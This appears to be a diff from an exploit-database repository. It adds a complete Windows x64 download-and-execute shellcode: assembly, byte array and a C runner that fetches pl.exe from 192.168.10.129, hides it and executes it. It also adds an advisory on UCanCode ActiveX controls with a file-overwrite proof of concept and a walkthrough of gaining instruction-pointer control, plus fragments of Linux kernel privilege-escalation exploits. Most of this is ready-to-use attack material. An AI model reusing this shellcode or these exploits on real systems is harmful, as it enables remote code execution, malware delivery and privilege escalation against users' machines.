if (!exp_state->got_ring0) {
fprintf(stdout, " [+] Failed to trigger the vulnerability. Is this a single processor machine with CONFIG_PREEMPT_NONE=y?\n");
return 0;
}
return 1;
}
int post(void)
{
// return RUN_ROOTSHELL;
return FUNNY_PIC_AND_ROOTSHELL;
}

4
platforms/linux/local/744.c
View file

@ -1,3 +1,7 @@
/*
* EDB Note: There's is an updated version ~ https://www.exploit-db.com/exploits/895/
*/
/*
* binfmt_elf uselib VMA insert race vulnerability
* v1.08

4
platforms/linux/local/778.c
View file

@ -1,3 +1,7 @@
/*
* EDB Note: There's is an updated version ~ https://www.exploit-db.com/exploits/895/
*/
/*
* Linux kernel 2.4 uselib() privilege elevation exploit.
*

332
platforms/win_x86-64/shellcode/40821.c Executable file
View file

@ -0,0 +1,332 @@
/*
# Title : Windows x64 Download+Execute Shellcode
# Author : Roziul Hasan Khan Shifat
# Date : 24-11-2016
# size : 358 bytes
# Tested on : Windows 7 x64 Professional
# Email : shifath12@gmail.com
*/
/*
section .text
global _start
_start:
;-----------------------------
sub rsp,88
lea r14,[rsp]
sub rsp,88
;------------------------------------------------
xor rdx,rdx
mov rax,[gs:rdx+0x60] ;PEB
mov rsi,[rax+0x18] ;PEB.Ldr
mov rsi,[rsi+0x10] ;PEB.Ldr->InMemOrderModuleList
lodsq
mov rsi,[rax]
mov rdi,[rsi+0x30] ;kernel32.dll base address
;---------------------------------------------------
mov ebx,[rdi+0x3c] ;elf_anew
add rbx,rdi
mov dl,0x88
mov ebx,[rbx+rdx]
add rbx,rdi
mov esi,[rbx+0x1c]
add rsi,rdi
;--------------------------------------------------
;loading urlmon.dll
mov dx,831
mov ebx,[rsi+rdx*4]
add rbx,rdi
xor rdx,rdx
mov [r14],dword 'urlm'
mov [r14+4],word 'on'
mov [r14+6],byte dl
lea rcx,[r14]
call rbx
mov dx,586
mov ebx,[rsi+rdx*4]
add rbx,rdi
xor rdx,rdx
mov rcx,'URLDownl'
mov [r14],rcx
mov rcx,'oadToFil'
mov [r14+8],rcx
mov [r14+16],word 'eA'
mov [r14+18],byte dl
lea rdx,[r14]
mov rcx,rax
call rbx
;;;;;;;;;;;;;;;;;;;;;;-------------------------------------
mov r15,rax
;------------------------------------------------
;save as 'C:\\Users\\Public\\p.exe' length: 24+1
mov rax,'C:\\User'
mov [r14],rax
mov rax,'s\\Publi'
mov [r14+8],rax
mov rax,'c\\p.exe'
mov [r14+16],rax
xor rdx,rdx
mov [r14+24],byte dl
;----------------------------------------
lea rcx,[r14+25]
;url "http://192.168.10.129/pl.exe" length: 28+1
mov rax,'http://1'
mov [rcx],rax
mov rax,'92.168.1'
mov [rcx+8],rax
mov rax,'0.129/pl'
mov [rcx+16],rax
mov [rcx+24],dword '.exe'
mov [rcx+28],byte dl
;---------------------------------------------------
sub rsp,88
download:
xor rcx,rcx
lea rdx,[r14+25]
lea r8,[r14]
xor r9,r9
mov [rsp+32],r9
call r15
xor rdx,rdx
cmp rax,rdx
jnz download
;------------------------------------------------
sub rsp,88
;-----------------------------------------------
;hiding file
mov dx,1131
mov ebx,[rsi+rdx*4]
add rbx,rdi ;SetFileAttributesA()
lea rcx,[r14]
xor rdx,rdx
mov dl,2
call rbx
;------------------------------------
;executing file
xor rdx,rdx
mov dx,1314
mov ebx,[rsi+rdx*4]
add rbx,rdi ;WinExec()
lea rcx,[r14]
xor rdx,rdx
call rbx
;------------------------------
xor rdx,rdx
mov dx,296
mov ebx,[rsi+rdx*4]
add rbx,rdi
;---------------------------------------
;if U use this shellcode for pe injection, then don't forget to free allocated space
add rsp,88
xor rcx,rcx
call rbx
*/
/*
Disassembly of section .text:
0000000000000000 <_start>:
0: 48 83 ec 58 sub $0x58,%rsp
4: 4c 8d 34 24 lea (%rsp),%r14
8: 48 83 ec 58 sub $0x58,%rsp
c: 48 31 d2 xor %rdx,%rdx
f: 65 48 8b 42 60 mov %gs:0x60(%rdx),%rax
14: 48 8b 70 18 mov 0x18(%rax),%rsi
18: 48 8b 76 10 mov 0x10(%rsi),%rsi
1c: 48 ad lods %ds:(%rsi),%rax
1e: 48 8b 30 mov (%rax),%rsi
21: 48 8b 7e 30 mov 0x30(%rsi),%rdi
25: 8b 5f 3c mov 0x3c(%rdi),%ebx
28: 48 01 fb add %rdi,%rbx
2b: b2 88 mov $0x88,%dl
2d: 8b 1c 13 mov (%rbx,%rdx,1),%ebx
30: 48 01 fb add %rdi,%rbx
33: 8b 73 1c mov 0x1c(%rbx),%esi
36: 48 01 fe add %rdi,%rsi
39: 66 ba 3f 03 mov $0x33f,%dx
3d: 8b 1c 96 mov (%rsi,%rdx,4),%ebx
40: 48 01 fb add %rdi,%rbx
43: 48 31 d2 xor %rdx,%rdx
46: 41 c7 06 75 72 6c 6d movl $0x6d6c7275,(%r14)
4d: 66 41 c7 46 04 6f 6e movw $0x6e6f,0x4(%r14)
54: 41 88 56 06 mov %dl,0x6(%r14)
58: 49 8d 0e lea (%r14),%rcx
5b: ff d3 callq *%rbx
5d: 66 ba 4a 02 mov $0x24a,%dx
61: 8b 1c 96 mov (%rsi,%rdx,4),%ebx
64: 48 01 fb add %rdi,%rbx
67: 48 31 d2 xor %rdx,%rdx
6a: 48 b9 55 52 4c 44 6f movabs $0x6c6e776f444c5255,%rcx
71: 77 6e 6c
74: 49 89 0e mov %rcx,(%r14)
77: 48 b9 6f 61 64 54 6f movabs $0x6c69466f5464616f,%rcx
7e: 46 69 6c
81: 49 89 4e 08 mov %rcx,0x8(%r14)
85: 66 41 c7 46 10 65 41 movw $0x4165,0x10(%r14)
8c: 41 88 56 12 mov %dl,0x12(%r14)
90: 49 8d 16 lea (%r14),%rdx
93: 48 89 c1 mov %rax,%rcx
96: ff d3 callq *%rbx
98: 49 89 c7 mov %rax,%r15
9b: 48 b8 43 3a 5c 5c 55 movabs $0x726573555c5c3a43,%rax
a2: 73 65 72
a5: 49 89 06 mov %rax,(%r14)
a8: 48 b8 73 5c 5c 50 75 movabs $0x696c6275505c5c73,%rax
af: 62 6c 69
b2: 49 89 46 08 mov %rax,0x8(%r14)
b6: 48 b8 63 5c 5c 70 2e movabs $0x6578652e705c5c63,%rax
bd: 65 78 65
c0: 49 89 46 10 mov %rax,0x10(%r14)
c4: 48 31 d2 xor %rdx,%rdx
c7: 41 88 56 18 mov %dl,0x18(%r14)
cb: 49 8d 4e 19 lea 0x19(%r14),%rcx
cf: 48 b8 68 74 74 70 3a movabs $0x312f2f3a70747468,%rax
d6: 2f 2f 31
d9: 48 89 01 mov %rax,(%rcx)
dc: 48 b8 39 32 2e 31 36 movabs $0x312e3836312e3239,%rax
e3: 38 2e 31
e6: 48 89 41 08 mov %rax,0x8(%rcx)
ea: 48 b8 30 2e 31 32 39 movabs $0x6c702f3932312e30,%rax
f1: 2f 70 6c
f4: 48 89 41 10 mov %rax,0x10(%rcx)
f8: c7 41 18 2e 65 78 65 movl $0x6578652e,0x18(%rcx)
ff: 88 51 1c mov %dl,0x1c(%rcx)
102: 48 83 ec 58 sub $0x58,%rsp
0000000000000106 <download>:
106: 48 31 c9 xor %rcx,%rcx
109: 49 8d 56 19 lea 0x19(%r14),%rdx
10d: 4d 8d 06 lea (%r14),%r8
110: 4d 31 c9 xor %r9,%r9
113: 4c 89 4c 24 20 mov %r9,0x20(%rsp)
118: 41 ff d7 callq *%r15
11b: 48 31 d2 xor %rdx,%rdx
11e: 48 39 d0 cmp %rdx,%rax
121: 75 e3 jne 106 <download>
123: 48 83 ec 58 sub $0x58,%rsp
127: 66 ba 6b 04 mov $0x46b,%dx
12b: 8b 1c 96 mov (%rsi,%rdx,4),%ebx
12e: 48 01 fb add %rdi,%rbx
131: 49 8d 0e lea (%r14),%rcx
134: 48 31 d2 xor %rdx,%rdx
137: b2 02 mov $0x2,%dl
139: ff d3 callq *%rbx
13b: 48 31 d2 xor %rdx,%rdx
13e: 66 ba 22 05 mov $0x522,%dx
142: 8b 1c 96 mov (%rsi,%rdx,4),%ebx
145: 48 01 fb add %rdi,%rbx
148: 49 8d 0e lea (%r14),%rcx
14b: 48 31 d2 xor %rdx,%rdx
14e: ff d3 callq *%rbx
150: 48 31 d2 xor %rdx,%rdx
153: 66 ba 28 01 mov $0x128,%dx
157: 8b 1c 96 mov (%rsi,%rdx,4),%ebx
15a: 48 01 fb add %rdi,%rbx
15d: 48 83 c4 58 add $0x58,%rsp
161: 48 31 c9 xor %rcx,%rcx
164: ff d3 callq *%rbx
*/
#include<windows.h>
#include<stdio.h>
#include<string.h>
char shellcode[]=\
"\x48\x83\xec\x58\x4c\x8d\x34\x24\x48\x83\xec\x58\x48\x31\xd2\x65\x48\x8b\x42\x60\x48\x8b\x70\x18\x48\x8b\x76\x10\x48\xad\x48\x8b\x30\x48\x8b\x7e\x30\x8b\x5f\x3c\x48\x01\xfb\xb2\x88\x8b\x1c\x13\x48\x01\xfb\x8b\x73\x1c\x48\x01\xfe\x66\xba\x3f\x03\x8b\x1c\x96\x48\x01\xfb\x48\x31\xd2\x41\xc7\x06\x75\x72\x6c\x6d\x66\x41\xc7\x46\x04\x6f\x6e\x41\x88\x56\x06\x49\x8d\x0e\xff\xd3\x66\xba\x4a\x02\x8b\x1c\x96\x48\x01\xfb\x48\x31\xd2\x48\xb9\x55\x52\x4c\x44\x6f\x77\x6e\x6c\x49\x89\x0e\x48\xb9\x6f\x61\x64\x54\x6f\x46\x69\x6c\x49\x89\x4e\x08\x66\x41\xc7\x46\x10\x65\x41\x41\x88\x56\x12\x49\x8d\x16\x48\x89\xc1\xff\xd3\x49\x89\xc7\x48\xb8\x43\x3a\x5c\x5c\x55\x73\x65\x72\x49\x89\x06\x48\xb8\x73\x5c\x5c\x50\x75\x62\x6c\x69\x49\x89\x46\x08\x48\xb8\x63\x5c\x5c\x70\x2e\x65\x78\x65\x49\x89\x46\x10\x48\x31\xd2\x41\x88\x56\x18\x49\x8d\x4e\x19\x48\xb8\x68\x74\x74\x70\x3a\x2f\x2f\x31\x48\x89\x01\x48\xb8\x39\x32\x2e\x31\x36\x38\x2e\x31\x48\x89\x41\x08\x48\xb8\x30\x2e\x31\x32\x39\x2f\x70\x6c\x48\x89\x41\x10\xc7\x41\x18\x2e\x65\x78\x65\x88\x51\x1c\x48\x83\xec\x58\x48\x31\xc9\x49\x8d\x56\x19\x4d\x8d\x06\x4d\x31\xc9\x4c\x89\x4c\x24\x20\x41\xff\xd7\x48\x31\xd2\x48\x39\xd0\x75\xe3\x48\x83\xec\x58\x66\xba\x6b\x04\x8b\x1c\x96\x48\x01\xfb\x49\x8d\x0e\x48\x31\xd2\xb2\x02\xff\xd3\x48\x31\xd2\x66\xba\x22\x05\x8b\x1c\x96\x48\x01\xfb\x49\x8d\x0e\x48\x31\xd2\xff\xd3\x48\x31\xd2\x66\xba\x28\x01\x8b\x1c\x96\x48\x01\xfb\x48\x83\xc4\x58\x48\x31\xc9\xff\xd3";
int main()
{
int len=strlen(shellcode);
DWORD l=0;
printf("shellcode length : %d\n",len);
VirtualProtect(shellcode,len,PAGE_EXECUTE_READWRITE,&l);
(* (int(*)()) shellcode)();
return 0;
}

329
platforms/windows/dos/40820.txt Executable file
View file

@ -0,0 +1,329 @@
UCanCode multiple vulnerabilities
Url: http://www.hmi-software.com/
http://www.ucancode.net/index.htm
http://www.ucancode.net/bbs/zhuce/login.htm
Description: Form vendor's web page "UCanCode Software is a Market Leading provider of HMI & SCADA, CAD, UML, GIS, Vector Graphics
and Real Time Data Visualization Graphics Source Code Kits for C/C++ and .NET software developers more than 40 countries
around the world!"
Great... 40 countries. It's time to take a look to their software!
Package name "UCanCode_Controls.zip"
After the installation, we can found these activex controls:
---------------------------------------------
ProgID: UCCVIEWER.UCCViewerCtrl.1
CLSID: {3B7B3C36-8515-4E15-BC46-D1BEBA2F360C}
---------------------------------------------
ProgID: UCCDRAW.UCCDrawCtrl.1
CLSID: {4B5BEE59-EDD2-4082-A9F7-D65E1CA20FA7}
---------------------------------------------
progID: TKDRAWCAD.TKDrawCADCtrl.1
CLSID: {9022B790-B810-45B4-80BC-2D94EEC5343C}
---------------------------------------------
ProgID: UCCPRINT.UCCPrintCtrl.1
CLSID: {A4FCBD44-6BF5-405C-9598-C8E8ADCE4488}
---------------------------------------------
ProgID: UCCDIAGRAM.UCCDiagramCtrl.1
CLSID: {B6A3BF2C-F770-4182-BE7F-103BF2C76826}
---------------------------------------------
ProgID: UCCUML.UCCUMLCtrl.1
CLSID: {C1F0EE85-363F-483D-97D0-87E2A537BFBA}
---------------------------------------------
ProgID: UCCHMI.UCCHMICtrl.1
CLSID: {EDBBC1DC-58B2-4404-85FD-F9B1C05D96EF}
---------------------------------------------
ProgID: UCCSIMPLE.UCCSIMPLECtrl.1
CLSID: {EF3AAE34-E60A-11E1-9656-00FF8A2F9C5B}
---------------------------------------------
and all are marked as: RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: False
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.altervista.org/
---------------------------------------------------------------------
INSECURE METHODS:
In these coontrols there are a lot of insecure methods which can be used to overwrite
arbitrary files in user's pc. This is the complete list:
1) various Export* methods
Library: UCCSIMPLELib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCSIM~1.OCX
Class: UCCSIMPLE {EF3AAE34-E60A-11E1-9656-00FF8A2F9C5B}
Sub ExportAsBitmapFile (ByVal strFile As String)
----------------------------------------
Library: UCCSIMPLELib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCSIM~1.OCX
Class: UCCSIMPLE {EF3AAE34-E60A-11E1-9656-00FF8A2F9C5B}
Sub ExportAsEMFFile (ByVal strFile As String)
----------------------------------------
Library: UCCHMILib - C:\PROGRA~1\UCANCO~1\UCANCO~1\HMI_OCX\UCCHMI.ocx
Class: UCCHMI {EDBBC1DC-58B2-4404-85FD-F9B1C05D96EF}
Sub ExportAsBitmapFile (ByVal strFile As String)
----------------------------------------
Library: UCCHMILib - C:\PROGRA~1\UCANCO~1\UCANCO~1\HMI_OCX\UCCHMI.ocx
Class: UCCHMI {EDBBC1DC-58B2-4404-85FD-F9B1C05D96EF}
Sub ExportAsEMFFile (ByVal strFile As String)
----------------------------------------
Library: UCCUMLLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCUML.ocx
Class: UCCUML {C1F0EE85-363F-483D-97D0-87E2A537BFBA}
Sub ExportAsBitmapFile (ByVal strFile As String)
----------------------------------------
Library: UCCUMLLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCUML.ocx
Class: UCCUML {C1F0EE85-363F-483D-97D0-87E2A537BFBA}
Sub ExportAsEMFFile (ByVal strFile As String)
----------------------------------------
Library: UCCUMLLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCUML.ocx
Class: UCCUML {C1F0EE85-363F-483D-97D0-87E2A537BFBA}
Function ExportBitmapData (ByRef phBlob As Long, ByVal imageShape As Long) As Boolean
----------------------------------------
Library: UCCDIAGRAMLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDIA~1.OCX
Class: UCCDiagram {B6A3BF2C-F770-4182-BE7F-103BF2C76826}
Sub ExportAsBitmapFile (ByVal strFile As String)
----------------------------------------
Library: UCCDIAGRAMLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDIA~1.OCX
Class: UCCDiagram {B6A3BF2C-F770-4182-BE7F-103BF2C76826}
Sub ExportAsEMFFile (ByVal strFile As String)
----------------------------------------
Library: UCCPRINTLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCPrint.ocx
Class: UCCPrint {A4FCBD44-6BF5-405C-9598-C8E8ADCE4488}
Sub ExportAsBitmapFile (ByVal strFile As String)
----------------------------------------
Library: UCCPRINTLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCPrint.ocx
Class: UCCPrint {A4FCBD44-6BF5-405C-9598-C8E8ADCE4488}
Sub ExportAsEMFFile (ByVal strFile As String)
----------------------------------------
Library: TKDRAWCADLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\TKDRAW~1.OCX
Class: TKDrawCAD {9022B790-B810-45B4-80BC-2D94EEC5343C}
Sub ExportAsBitmapFile (ByVal strFile As String)
----------------------------------------
Library: TKDRAWCADLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\TKDRAW~1.OCX
Class: TKDrawCAD {9022B790-B810-45B4-80BC-2D94EEC5343C}
Sub ExportAsEMFFile (ByVal strFile As String)
----------------------------------------
Library: UCCDRAWLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDraw.ocx
Class: UCCDraw {4B5BEE59-EDD2-4082-A9F7-D65E1CA20FA7}
Sub ExportAsBitmapFile (ByVal strFile As String)
----------------------------------------
Library: UCCDRAWLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDraw.ocx
Class: UCCDraw {4B5BEE59-EDD2-4082-A9F7-D65E1CA20FA7}
Sub ExportAsEMFFile (ByVal strFile As String)
----------------------------------------
Library: UCCDRAWLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDraw.ocx
Class: UCCDraw {4B5BEE59-EDD2-4082-A9F7-D65E1CA20FA7}
Function ExportToBitmapFile (ByVal lpszFile As String) As Boolean
----------------------------------------
Library: UCCVIEWERLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCVIE~1.OCX
Class: UCCViewer {3B7B3C36-8515-4E15-BC46-D1BEBA2F360C}
Sub ExportAsBitmapFile (ByVal strFile As String)
----------------------------------------
Library: UCCVIEWERLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCVIE~1.OCX
Class: UCCViewer {3B7B3C36-8515-4E15-BC46-D1BEBA2F360C}
Sub ExportAsEMFFile (ByVal strFile As String)
----------------------------------------
2) various Save* methods:
----------------------------------------
Library: UCCSIMPLELib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCSIM~1.OCX
Class: UCCSIMPLE {EF3AAE34-E60A-11E1-9656-00FF8A2F9C5B}
Function SaveMemory2 (ByVal filename As String, ByVal pData As Long, ByVal nSize As Long) As Boolean
----------------------------------------
Library: UCCHMILib - C:\PROGRA~1\UCANCO~1\UCANCO~1\HMI_OCX\UCCHMI.ocx
Class: UCCHMI {EDBBC1DC-58B2-4404-85FD-F9B1C05D96EF}
Function SaveMemory2 (ByVal filename As String, ByVal pData As Long, ByVal nSize As Long) As Boolean
----------------------------------------
Library: UCCUMLLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCUML.ocx
Class: UCCUML {C1F0EE85-363F-483D-97D0-87E2A537BFBA}
Function SaveMemory2 (ByVal filename As String, ByVal pData As Long, ByVal nSize As Long) As Boolean
----------------------------------------
Library: UCCDIAGRAMLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDIA~1.OCX
Class: UCCDiagram {B6A3BF2C-F770-4182-BE7F-103BF2C76826}
Function SaveMemory2 (ByVal filename As String , ByVal pData As Long , ByVal nSize As Long) As Boolean
----------------------------------------
Library: UCCDIAGRAMLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDIA~1.OCX
Class: UCCDiagram {B6A3BF2C-F770-4182-BE7F-103BF2C76826}
Sub SaveToXdgFile (ByVal lpszFileName As String)
----------------------------------------
Library: UCCDIAGRAMLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDIA~1.OCX
Class: UCCDiagram {B6A3BF2C-F770-4182-BE7F-103BF2C76826}
Function SaveTemplateToFile (ByVal strFile As String) As Boolean
----------------------------------------
Library: UCCPRINTLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCPrint.ocx
Class: UCCPrint {A4FCBD44-6BF5-405C-9598-C8E8ADCE4488}
Function SaveMemory2 (ByVal filename As String , ByVal pData As Long , ByVal nSize As Long) As Boolean
----------------------------------------
Library: UCCPRINTLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCPrint.ocx
Class: UCCPrint {A4FCBD44-6BF5-405C-9598-C8E8ADCE4488}
Sub SaveToXdgFile (ByVal lpszFileName As String)
----------------------------------------
Library: UCCPRINTLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCPrint.ocx
Class: UCCPrint {A4FCBD44-6BF5-405C-9598-C8E8ADCE4488}
Function SaveTemplateToFile (ByVal strFile As String) As Boolean
----------------------------------------
Library: TKDRAWCADLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\TKDRAW~1.OCX
Class: TKDrawCAD {9022B790-B810-45B4-80BC-2D94EEC5343C}
Function SaveMemory2 (ByVal filename As String , ByVal pData As Long , ByVal nSize As Long) As Boolean
----------------------------------------
Library: TKDRAWCADLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\TKDRAW~1.OCX
Class: TKDrawCAD {9022B790-B810-45B4-80BC-2D94EEC5343C}
Sub SaveToXdgFile (ByVal lpszFileName As String)
----------------------------------------
Library: TKDRAWCADLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\TKDRAW~1.OCX
Class: TKDrawCAD {9022B790-B810-45B4-80BC-2D94EEC5343C}
Function SaveTemplateToFile (ByVal strFile As String) As Boolean
----------------------------------------
Library: UCCDRAWLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDraw.ocx
Class: UCCDraw {4B5BEE59-EDD2-4082-A9F7-D65E1CA20FA7}
Function SaveMemory2 (ByVal filename As String, ByVal pData As Long, ByVal nSize As Long) As Boolean
----------------------------------------
Library: UCCDRAWLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDraw.ocx
Class: UCCDraw {4B5BEE59-EDD2-4082-A9F7-D65E1CA20FA7}
Function SaveDocument (ByVal lpszFileName As String) As Boolean
----------------------------------------
Library: UCCDRAWLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDraw.ocx
Class: UCCDraw {4B5BEE59-EDD2-4082-A9F7-D65E1CA20FA7}
Sub SaveToXdgFile (ByVal lpszFileName As String)
----------------------------------------
Library: UCCVIEWERLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCVIE~1.OCX
Class: UCCViewer {3B7B3C36-8515-4E15-BC46-D1BEBA2F360C}
Function SaveMemory2 (ByVal filename As String, ByVal pData As Long, ByVal nSize As Long) As Boolean
----------------------------------------
Library: UCCVIEWERLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCVIE~1.OCX
Class: UCCViewer {3B7B3C36-8515-4E15-BC46-D1BEBA2F360C}
Sub SaveToXdgFile (ByVal lpszFileName As String)
----------------------------------------
Library: UCCVIEWERLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCVIE~1.OCX
Class: UCCViewer {3B7B3C36-8515-4E15-BC46-D1BEBA2F360C}
Function SaveTemplateToFile (ByVal strFile As String) As Boolean
----------------------------------------
3) various Write methods:
----------------------------------------
Library: UCCSIMPLELib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCSIM~1.OCX
Class: UCCSIMPLE {EF3AAE34-E60A-11E1-9656-00FF8A2F9C5B}
Function Write (ByVal lpszFileName As String) As Boolean
----------------------------------------
Library: UCCHMILib - C:\PROGRA~1\UCANCO~1\UCANCO~1\HMI_OCX\UCCHMI.ocx
Class: UCCHMI {EDBBC1DC-58B2-4404-85FD-F9B1C05D96EF}
Function Write (ByVal lpszFileName As String) As Boolean
----------------------------------------
Library: UCCUMLLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCUML.ocx
Class: UCCUML {C1F0EE85-363F-483D-97D0-87E2A537BFBA}
Function Write (ByVal lpszFileName As String) As Boolean
----------------------------------------
Library: UCCDIAGRAMLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDIA~1.OCX
Class: UCCDiagram {B6A3BF2C-F770-4182-BE7F-103BF2C76826}
Function Write (ByVal lpszFileName As String) As Boolean
----------------------------------------
Library: UCCPRINTLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCPrint.ocx
Class: UCCPrint {A4FCBD44-6BF5-405C-9598-C8E8ADCE4488}
Function Write (ByVal lpszFileName As String) As Boolean
----------------------------------------
Library: TKDRAWCADLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\TKDRAW~1.OCX
Class: TKDrawCAD {9022B790-B810-45B4-80BC-2D94EEC5343C}
Function Write (ByVal lpszFileName As String) As Boolean
----------------------------------------
Library: UCCDRAWLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDraw.ocx
Class: UCCDraw {4B5BEE59-EDD2-4082-A9F7-D65E1CA20FA7}
Function Write (ByVal lpszFileName As String) As Boolean
----------------------------------------
Library: UCCVIEWERLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCVIE~1.OCX
Class: UCCViewer {3B7B3C36-8515-4E15-BC46-D1BEBA2F360C}
Function Write (ByVal lpszFileName As String) As Boolean
----------------------------------------
PROOF OF CONCEPT:
<html>
<object classid="clsid:B6A3BF2C-F770-4182-BE7F-103BF2C76826" id="test"></object>
<script language = "vbscript">
test.SaveTemplateToFile buff,C:\Windows\_system.ini
</script>
</html>
----------------------------------------
----------------------------------------
REMOTE CODE EXECUTION
This product is so poor coded that remote code execution is possible using a lot of functions (and I'm lazy),
so here it is the description of just one of it, "AddDWordUserProperty":
CPU Disasm
Address Hex dump Command Comments
...
...
1007FEB5 |. 8D5424 44 LEA EDX,[LOCAL.36]
1007FEB9 |. 51 PUSH ECX
1007FEBA |. 8B06 MOV EAX,DWORD PTR DS:[ESI] <- WE CAN CONTROL ESI
1007FEBC |. 52 PUSH EDX
1007FEBD |. 8BCE MOV ECX,ESI
1007FEBF |. C78424 DC0000 MOV DWORD PTR SS:[LOCAL.0],0
1007FECA |. 897C24 10 MOV DWORD PTR SS:[LOCAL.51],EDI
1007FECE |. FF90 04030000 CALL DWORD PTR DS:[EAX+304]
1007FED4 |. 85C0 TEST EAX,EAX
...
...
Registers:
CPU - thread 9. (00000B38), module UCCVIE~1_OCX
EAX 015DD1D0
ECX 015DD194
EDX 015DD1D0
EBX 00000000
ESP 015DD188
EBP 015DD300
ESI 41414141 <- FIRST ARGUMENT PASSED TO AddDWordUserProperty METHOD
EDI 42424242 <- SECOND ARGUMENT PASSED TO AddDWordUserProperty METHOD
EIP 1007FEBA UCCVIE~1_OCX.1007FEBA
----------------------------------------------------------------------
We can use it to pass a valid memory address so that we can find a more comfortable situation :)
CPU Disasm
Address Hex dump Command Comments
...
...
1007FEB5 |. 8D5424 44 LEA EDX,[LOCAL.36]
1007FEB9 |. 51 PUSH ECX
1007FEBA |. 8B06 MOV EAX,DWORD PTR DS:[ESI]
1007FEBC |. 52 PUSH EDX
1007FEBD |. 8BCE MOV ECX,ESI
1007FEBF |. C78424 DC0000 MOV DWORD PTR SS:[LOCAL.0],0
1007FECA |. 897C24 10 MOV DWORD PTR SS:[LOCAL.51],EDI
1007FECE |. FF90 04030000 CALL DWORD PTR DS:[EAX+304] <- WE NOW ARE IN CONTROL OF EAX
1007FED4 |. 85C0 TEST EAX,EAX
...
...
Registers
CPU - thread 9. (00000B38), module UCCVIE~1_OCX
EAX 45454545 <- THIS VALUE THAT WAS PREVIOUSLY STORED IN MEMORY, IF WE CHANGE IT IN ANOTHER VALID ADDRESS...
ECX 00030040 ASCII "EEEE"
EDX 015DD1D0
EBX 00000000
ESP 015DD184
EBP 015DD300
ESI 00030040 ASCII "EEEE"
EDI 42424242
EIP 1007FECE UCCVIE~1_OCX.1007FECE
And...
CPU - thread 9. (00000B38)
EAX 0002FDBC
ECX 00030040 ASCII "EEEE"
EDX 015DD1D0
EBX 00000000
ESP 015DD180
EBP 015DD300
ESI 00030040 ASCII "EEEE"
EDI 42424242
EIP 46464646 <- BINGO :)
----------------------------------------
----------------------------------------
BONUS STAGE:
There are a huge number of DoS... happy hunting :)
Peace, your friendly neighborhood shinnai.
---------------------------------------------------------------------